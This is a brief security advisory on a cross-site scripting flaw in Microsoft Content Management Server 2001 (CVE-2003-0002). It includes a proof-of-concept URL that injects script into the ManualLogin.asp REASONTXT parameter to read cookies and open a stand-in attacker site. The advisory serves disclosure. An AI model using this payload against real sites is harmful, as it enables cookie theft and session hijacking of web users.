Microsoft Content Management Server 2001 - Cross-Site Scripting

Related Vulnerabilities: CVE-2003-0002  
Publish Date: 09 Oct 2002
                source: http://www.securityfocus.com/bid/5922/info

Microsoft Content Management Server 2001 is reported to be prone to cross-site scripting attacks.

An attacker could construct a malicious link to a vulnerable host that contains arbitrary HTML and script code. If this link is visited by a web user, the attacker-supplied code will be rendered in their browser, in the security context of the vulnerable site.

http://www.example.com/NR/System/Access/ManualLogin.asp?
REASONTXT=<script>alert(document.cookie);window.open
("http://attacker.site.example.com");</SCRIPT>